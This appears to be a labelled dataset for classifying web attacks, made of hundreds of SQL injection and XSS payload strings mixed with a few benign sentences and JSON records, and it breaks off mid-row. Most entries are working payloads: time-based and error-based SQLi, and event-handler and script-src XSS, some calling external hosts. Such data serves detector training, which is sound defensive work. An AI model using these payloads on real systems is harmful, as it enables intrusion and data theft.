-"-5622"" where 7970 = 7970 union all select 7970,7970,7970,7970,7970--",2,SQLi,13636 -"1"" ) ) ) and ( 7758 = 4628 ) *4628 and ( ( ( ""wzas"" = ""wzas",2,SQLi,15817 -"1"" ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( ""wjhj"" = ""wjhj",2,SQLi,12509 -"1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'tvar' = 'tvar",2,SQLi,19461 -1%' ) ) ) order by 1#,2,SQLi,13163 -onDragEnd,1,XSS,9652 -"-7142' ) ) union all select 5083,5083,5083,5083#",2,SQLi,16113 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual--",2,SQLi,12623 -;waitfor delay '0:0:5'--,2,SQLi,10395 -"1"" where 9332 = 9332 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15660 -"1"" where 6800 = 6800 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12510 -"select * from users where id = 1 +$+. union select null,@@VERSION -- 1",2,SQLi,11986 -"<a onmousedown=""alert(1)"">test</a>",1,XSS,3231 -RANDOMBLOB(500000000/2),2,SQLi,10442 -<main onpointerdown=alert(1)>XSS</main>,1,XSS,2919 -onKeyDown,1,XSS,9669 -"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( '%' = '",2,SQLi,16404 -"-1390%"" ) ) union all select 8930,8930,8930,8930,8930#",2,SQLi,13848 -1' ) ) rlike ( select ( case when ( 8489 = 8820 ) then 1 else 0x28 end ) ) and ( ( 'fbjf' = 'fbjf,2,SQLi,16224 -Delete old bookmarks.,0,normal,22994 -1%' ) waitfor delay '0:0:5'--,2,SQLi,19102 -"-2916"" ) ) or 4946 = 8232--",2,SQLi,14953 -"-5830 ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,21752 -"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'fsvr' = 'fsvr",2,SQLi,16806 -"1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'aovy' = 'aovy",2,SQLi,17137 --7034' ) ) ) union all select 4023#,2,SQLi,16420 -"<nav draggable=""true"" ondragend=""alert(1)"">test</nav>",1,XSS,8780 -&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;,1,XSS,1039 -<title onpointerleave=alert(1)>XSS</title>,1,XSS,5447 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 'xcxr' like 'xcxr",2,SQLi,21255 -"<td oncontextmenu=""alert(1)"">test</td>",1,XSS,5765 -"<s onmouseout=""alert(1)"">test</s>",1,XSS,7601 -"1"" ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( ""suxh"" = ""suxh",2,SQLi,15553 -<link href=validstyles.css rel=stylesheet onload=alert(1)>,1,XSS,8514 -Select your choice.,0,normal,25065 -"{""id"":null,""name"":""Breloom""}",0,normal,25469 -"<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>",1,XSS,9255 -<svg><image href=validimage.png onload=alert(1)>,1,XSS,8680 -"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("""")>",1,XSS,5082 -<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe>,1,XSS,3921 -"<body onMouseOver body onMouseOver=""javascript:javascript:alert(1)""></body onMouseOver>",1,XSS,361 -"1"" ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,20496 -Select a fitness class to stay active.,0,normal,24405 -""",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10938 -"<script\x0Dtype=""text/javascript"">javascript:alert(1);</script>",1,XSS,336 -"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'udvq' = 'udvq",2,SQLi,17801 -"1' in boolean mode ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20053 -<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1),1,XSS,821 -"1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,16203 -"-9858"" or 8592 = 8553",2,SQLi,16826 -<applet id=x tabindex=1 onactivate=alert(1)></applet>,1,XSS,5050 -<xss:xss>XSS</xss:xss>,1,XSS,9810 -"{""id"":null,""firstName"":""玉兰"",""lastName"":""玉兰"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26077 -<article onpointerenter=alert(1)>XSS</article>,1,XSS,6483 -"{""id"":null,""name"":""trip""}",0,normal,26006 -and 'one'='one–,2,SQLi,10023 -<legend onpointerenter=alert(1)>XSS</legend>,1,XSS,8576 -1 ) ) as smtf where 5829 = 5829,2,SQLi,21164 -"1 ) where 6788 = 6788 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,13733 -"<;META HTTP-EQUIV="";Set-Cookie""; Content="";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;"";>;",1,XSS,1572 -1' ) as zmvn where 2887 = 2887 union all select null--,2,SQLi,20163 -"<frame onmouseout=""alert(1)"">test</frame>",1,XSS,4978 -Filter out irrelevant comments from the post.,0,normal,23089 -"<rb ondblclick=""alert(1)"">test</rb>",1,XSS,6776 -"<acronym onkeypress=""alert(1)"" contenteditable>test</acronym>",1,XSS,3220 -"<rp onbeforepaste=""alert(1)"" contenteditable>test</rp>",1,XSS,6553 -"<textarea><img title=""</textarea><img src onerror=alert(1)>""></textarea>",1,XSS,116 -"-5972"" or 8509 = 3448#",2,SQLi,16986 -1'|| ( select 'rhcv' where 6228 = 6228,2,SQLi,15613 -"1%' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and '%' = '",2,SQLi,15888 -<source onblur=alert(1) tabindex=1 id=x></source><input autofocus>,1,XSS,8617 -alert(1)//,1,XSS,9470 -"1 ) as jqbv where 8172 = 8172 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,22356 -1 ) where 3979 = 3979 rlike sleep ( 5 ) --,2,SQLi,19062 -1 ) ) as sfan where 7176 = 7176 and 7017 = 7358,2,SQLi,12630 -"-6854"" where 7794 = 7794 union all select 7794,7794--",2,SQLi,16335 -<source id=x tabindex=1 onfocusin=alert(1)></source>,1,XSS,8346 -"<div draggable=""true"" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command>",1,XSS,2593 -"<style>@keyframes x{}</style><multicol style=""animation-name:x"" onanimationstart=""alert(1)""></multicol>",1,XSS,3674 -<mark onpointerup=alert(1)>XSS</mark>,1,XSS,2302 -They must select quickly.,0,normal,24487 -"1'|| ( select 'mgel' where 3591 = 3591 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) ||'",2,SQLi,19608 -<base onpointerleave=alert(1)>XSS</base>,1,XSS,4154 --8143 ) union all select 3014--,2,SQLi,13298 -"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>",1,XSS,281 --2992%' ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( '%' = ',2,SQLi,20990 -bfilename,2,SQLi,11816 -select ( case when ( 3681 = 5989 ) then 3681 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,14516 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23",2,SQLi,11023 -HAVING 1=1#,2,SQLi,10247 -<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>,1,XSS,577 -"-4865 where 1386 = 1386 union all select 1386,1386,1386,1386#",2,SQLi,17708 -<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus>,1,XSS,3459 -"<button draggable=""true"" ondragleave=""alert(1)"">test</button>",1,XSS,6620 -"<canvas oncopy=""alert(1)"" contenteditable>test</canvas>",1,XSS,8117 -1' in boolean mode ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,15877 -"exp/*<;XSS STYLE=';no\xss:noxss("";*//*"";);",1,XSS,1541 -"-7088'|| ( select 'arol' from dual where 8891 = 8891 union all select 8891,8891,8891,8891,8891,8891,8891,8891#",2,SQLi,16495 -1%' ) ) rlike sleep ( 5 ) and ( ( '%' = ',2,SQLi,15571 -"1', ( select ( case when ( 7734 = 7734 ) then ( select benchmark ( 5000000,md5 ( 0x72747341 ) ) ) else 7734* ( select 7734 from mysql.db ) end ) )",2,SQLi,19816 -"<rb oncopy=""alert(1)"" contenteditable>test</rb>",1,XSS,6502 -",if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --",2,SQLi,11505 -1' ) ) ) and 3602 = 1990#,2,SQLi,14305 -"<rt onmousemove=""alert(1)"">test</rt>",1,XSS,2147 -1' ) ) order by 1#,2,SQLi,13914 -"-9509 ) union all select 1193,1193,1193#",2,SQLi,15462 -<tbody onpointerup=alert(1)>XSS</tbody>,1,XSS,7594 -"1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'javh' = 'javh",2,SQLi,22593 -select ( case when ( 9816 = 1693 ) then 9816 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,14387 -select case when 8514 = 3207 then 1 else null end--,2,SQLi,20553 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#",2,SQLi,10845 -"or a""=""a",2,SQLi,10056 -"<meta name=""referrer"" content=""no-referrer"">",1,XSS,181 -"-1920' ) ) ) union all select 1424,1424,1424,1424,1424,1424,1424,1424,1424,1424#",2,SQLi,21061 -"<article onkeypress=""alert(1)"" contenteditable>test</article>",1,XSS,2347 -1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'gsjp' = 'gsjp,2,SQLi,14528 -select ( case when ( 9455 = 6007 ) then 9455 else 9455* ( select 9455 from mysql.db ) end ) #,2,SQLi,12425 -1%' ) ) and 2006 = 2006,2,SQLi,18791 -Select your brand.,0,normal,25076 -order by,2,SQLi,12132 -"{""id"":null,""name"":""Carbink""}",0,normal,25411 -"1', ( select ( case when ( 5433 = 5433 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,14501 -Where's the data source?,0,normal,23650 -end and ( 'hmtt' like 'hmtt,2,SQLi,16101 -"1', ( select ( case when ( 5777 = 5777 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,15112 -"1' and make_set ( 8403 = 8403,8899 ) and 'lnwe' = 'lnwe",2,SQLi,15418 -"<samp onbeforepaste=""alert(1)"" contenteditable>test</samp>",1,XSS,4454 -"-5493"" ) ) union all select 8001,8001--",2,SQLi,15914 -<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus>,1,XSS,5280 -1'|| ( select 'kptj' from dual where 5123 = 5123,2,SQLi,16763 -1'|| ( select 'zeet' from dual where 9567 = 9567 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,20078 -<output id=x tabindex=1 onfocusin=alert(1)></output>,1,XSS,3494 -<<SCRIPT>alert(?XSS?);//<</SCRIPT>,1,XSS,1671 -"1' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'tqvy' like 'tqvy",2,SQLi,15728 -Where's the vacation home?,0,normal,23739 -"select * from users where id = 1 + @`\` union select 1,version ( ) -- 1",2,SQLi,12081 -Modify data where needed.,0,normal,23434 -Where should we meet for our date?,0,normal,23160 -"-4944%"" ) ) or make_set ( 1084 = 1988,1988 ) and ( ( ""%"" = """,2,SQLi,16708 -Select view.,0,normal,24791 -"""></title><script>alert(1111)</script>",1,XSS,1271 -"<div draggable=""true"" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet>",1,XSS,7514 -Can you help me decide where to go for dinner?,0,normal,24040 -"<style>:target {transform: rotate(180deg);}</style><footer id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></footer>",1,XSS,8454 -"<body onbeforecut=""alert(1)"" contenteditable>test</body>",1,XSS,2519 -"select pg_sleep ( 5 ) and ( ( ""byhx"" like ""byhx",2,SQLi,20350 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></ul>",1,XSS,6778 -<article id=x tabindex=1 onbeforeactivate=alert(1)></article>,1,XSS,8831 -1%' union all select null#,2,SQLi,20603 -"<xmp onmouseenter=""alert(1)"">test</xmp>",1,XSS,4384 -"select * from users where id = 1 * ( \ ) union select null,@@VERSION -- 1",2,SQLi,11807 -"<xmp draggable=""true"" ondragend=""alert(1)"">test</xmp>",1,XSS,7052 -"<canvas draggable=""true"" ondragstart=""alert(1)"">test</canvas>",1,XSS,2623 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,10648 -"-7146"" where 6431 = 6431 or 8548 = 5549--",2,SQLi,19033 -"<div id=""63""><embed src=""javascript:alert(63)""></embed> // O10.10?, OM10.0?, GC6?, FF",1,XSS,9126 -Choose fields where valid.,0,normal,23501 -"1"" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,22004 -"-7202%"" ) ) union all select 2901#",2,SQLi,20497 -"1' ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15883 -1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'pneh' like 'pneh,2,SQLi,17965 -"<object classid=""clsid:..."" codebase=""javascript:document.vulnerable=true;"">",1,XSS,1484 -"<dialog onmouseleave=""alert(1)"">test</dialog>",1,XSS,4218 -"<object onclick=""alert(1)"">test</object>",1,XSS,6040 -"1%' and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,20690 -"<tbody ondblclick=""alert(1)"">test</tbody>",1,XSS,6917 -"1"" ) and 6565 = 2647 and ( ""mrge"" like ""mrge",2,SQLi,14647 -"<template onkeyup=""alert(1)"" contenteditable>test</template>",1,XSS,5333 -"<a href=""javascript:alert(1)"">ssss</a>",1,XSS,9792 -<s id=x tabindex=1 onfocus=alert(1)></s>,1,XSS,6221 -"-6733' ) where 4024 = 4024 union all select 4024,4024,4024,4024#",2,SQLi,14935 -Select van.,0,normal,24887 -"-9779' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( 'hmzj' = 'hmzj",2,SQLi,14661 -"1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'ydxb' = 'ydxb",2,SQLi,22378 -"-8419 ) where 8692 = 8692 union all select 8692,8692,8692--",2,SQLi,17925 -<image src=validimage.png onloadstart=alert(1)>,1,XSS,4282 -1%' rlike sleep ( 5 ) and '%' = ',2,SQLi,20065 -Select your achievement.,0,normal,25113 -<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus>,1,XSS,8020 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3--",2,SQLi,13363 -"-2190' ) where 8890 = 8890 union all select 8890,8890#",2,SQLi,22372 -"1' ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'qgov' = 'qgov",2,SQLi,12587 -"1%"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""%"" = """,2,SQLi,22462 -1%' ) ) ) order by 1--,2,SQLi,16996 -"<thead oncontextmenu=""alert(1)"">test</thead>",1,XSS,6231 -<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript>,1,XSS,5971 -"<li draggable=""true"" ondrag=""alert(1)"">test</li>",1,XSS,8655 -"insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)",2,SQLi,10093 -Where's the skincare clinic?,0,normal,23826 -\u0061lert(1),1,XSS,9420 -Select reboot.,0,normal,24810 -"1' ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14800 --3582' ) or 6872 = 6872 and ( 'gyfj' = 'gyfj,2,SQLi,16401 -"1%"" ) )",2,SQLi,21818 -<iframe src=http://.rocks/scriptlet.html <,1,XSS,4022 -"<tbody onmouseenter=""alert(1)"">test</tbody>",1,XSS,7560 -"<picture oncopy=""alert(1)"" contenteditable>test</picture>",1,XSS,2210 -1' in boolean mode ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) #,2,SQLi,18821 -* ( | ( objectclass = * ) ),2,SQLi,12168 -"1' in boolean mode ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) #",2,SQLi,18307 -Where's your SQL aid?,0,normal,23593 -""" or 0 = 0 --",2,SQLi,11507 -HAVING 1=1,2,SQLi,10245 -"1 ) as agex where 8167 = 8167 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,19913 -"1 where 5485 = 5485 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,14087 -"1 and elt ( 3172 = 7243,7243 )",2,SQLi,21672 -select * from users where id = 1 + \+%1 or 1 = 1 -- 1,2,SQLi,11614 -"<style>@keyframes x{}</style><li style=""animation-name:x"" onanimationend=""alert(1)""></li>",1,XSS,4292 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></time>",1,XSS,7956 -Select your switch.,0,normal,25227 -&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;,1,XSS,1315 -I'll select wine.,0,normal,24965 -"select * from generate_series ( 1431,1431,case when ( 1431 = 7822 ) then 1 else 0 end ) limit 1--",2,SQLi,20688 -"<blink draggable=""true"" ondragenter=""alert(1)"">test</blink>",1,XSS,7786 -"<style>@keyframes x{}</style><ol style=""animation-name:x"" onanimationend=""alert(1)""></ol>",1,XSS,5684 -<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>,1,XSS,130 -Where's the hospital?,0,normal,23695 -"1, ( select ( case when ( 3743 = 9640 ) then 1 else 3743* ( select 3743 from master..sysdatabases ) end ) )",2,SQLi,20415 -"-5064 ) as mzxc where 1889 = 1889 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,17819 -"<samp onmousedown=""alert(1)"">test</samp>",1,XSS,8642 -Merge the puzzle pieces to complete it.,0,normal,23144 -";alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//\"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search",1,XSS,904 -"1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'vrim' = 'vrim",2,SQLi,19030 -"<HTML><BODY> -<?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""> -<?import namespace=""t"" implementation=""#default#time2""> -<t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""> -</BODY></HTML>",1,XSS,285 -"1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""msjh"" like ""msjh",2,SQLi,13266 -"<SCRIPT/SRC=""http://xss.rocks/xss.js""></SCRIPT>",1,XSS,248 -"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'""-->",1,XSS,287 --6712' ) ) as kqff where 9146 = 9146 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,14955 -"-8654' union all select 7190,7190,7190,7190,7190#",2,SQLi,22277 -"<spacer onmouseleave=""alert(1)"">test</spacer>",1,XSS,6809 -"1'|| ( select 'ymac' from dual where 9268 = 9268 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ) ||'",2,SQLi,15432 -"<! foo=""><script>javascript:alert(1)</script>"">",1,XSS,602 -"<font onbeforepaste=""alert(1)"" contenteditable>test</font>",1,XSS,5641 -1'+ ( select gthp where 7311 = 7311 or sleep ( 5 ) #,2,SQLi,14983 -"1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 8979,8979,case when ( 8979 = 8979 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,14828 -"<style>@keyframes x{}</style><data style=""animation-name:x"" onanimationend=""alert(1)""></data>",1,XSS,4411 -1' order by 1#,2,SQLi,12571 -"1', ( case when 2872 = 2872 then 1 else null end )",2,SQLi,22566 -</image>,1,XSS,9009 -"<img draggable=""true"" ondragend=""alert(1)"">test</img>",1,XSS,8505 -"<style>@keyframes x{}</style><canvas style=""animation-name:x"" onanimationend=""alert(1)""></canvas>",1,XSS,8716 -"<content onkeyup=""alert(1)"" contenteditable>test</content>",1,XSS,4488 -"1"" where 1132 = 1132 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",2,SQLi,15334 -"x' AND 1 = ( SELECT COUNT ( * ) FROM tabname ) ,",2,SQLi,12039 -"<font onbeforecut=""alert(1)"" contenteditable>test</font>",1,XSS,4581 -1' ) ) union all select null--,2,SQLi,18143 -"1"" and 4595 = 4595#",2,SQLi,18257 -"select * from users where id = 1 union select 1a#,banner from v$version where rownum = 1 -- 1",2,SQLi,12166 -"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'vfnl' = 'vfnl",2,SQLi,14706 -<title onpointerdown=alert(1)>XSS</title>,1,XSS,2459 -"<div draggable=""true"" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure>",1,XSS,3563 -"<noembed onbeforecut=""alert(1)"" contenteditable>test</noembed>",1,XSS,7475 -"-2717"" or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,19346 -"<form oncut=""alert(1)"" contenteditable>test</form>",1,XSS,4200 -"-2033"" ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,22573 -"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5--",2,SQLi,20148 -"<style>@keyframes x{}</style><summary style=""animation-name:x"" onanimationstart=""alert(1)""></summary>",1,XSS,5380 -select ( case when ( 4774 = 1535 ) then 4774 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,15605 -![a](javascript:prompt(document.cookie))\,1,XSS,9434 -"-3219"" ) order by 1--",2,SQLi,21351 -"and (select substring(@@version,2,1))='i'",2,SQLi,10379 -"1' ) as ycsr where 2238 = 2238 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13347 -"`'><script>-javascript:alert(518)</script> -`'><script>\x00javascript:alert(1)</script>",1,XSS,8930 -"<blink onclick=""alert(1)"">test</blink>",1,XSS,5158 -"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ""eiuc"" like ""eiuc",2,SQLi,13722 -"1%' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and '%' = '",2,SQLi,14404 -<body>Hello</body>,1,XSS,9069 -"<body onPropertyChange body onPropertyChange=""javascript:javascript:alert(1)""></body onPropertyChange>",1,XSS,358 -"{""id"":null,""firstName"":""Wee"",""lastName"":""Ching"",""address"":""74989 Brandon St"",""city"":""15"",""telephone"":""4823489780""}",0,normal,26007 -"-4993"" union all select 6959,6959,6959--",2,SQLi,19739 -<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>,1,XSS,3036 -%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-,1,XSS,1086 -"1' ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'amjh' = 'amjh",2,SQLi,21252 -select ( case when ( 5418 = 6516 ) then 1 else 5418* ( select 5418 from master..sysdatabases ) end ) --,2,SQLi,20463 -"<rt onkeyup=""alert(1)"" contenteditable>test</rt>",1,XSS,4848 -"1"" ) and ( select 9067 from ( select count ( * ) ,concat ( 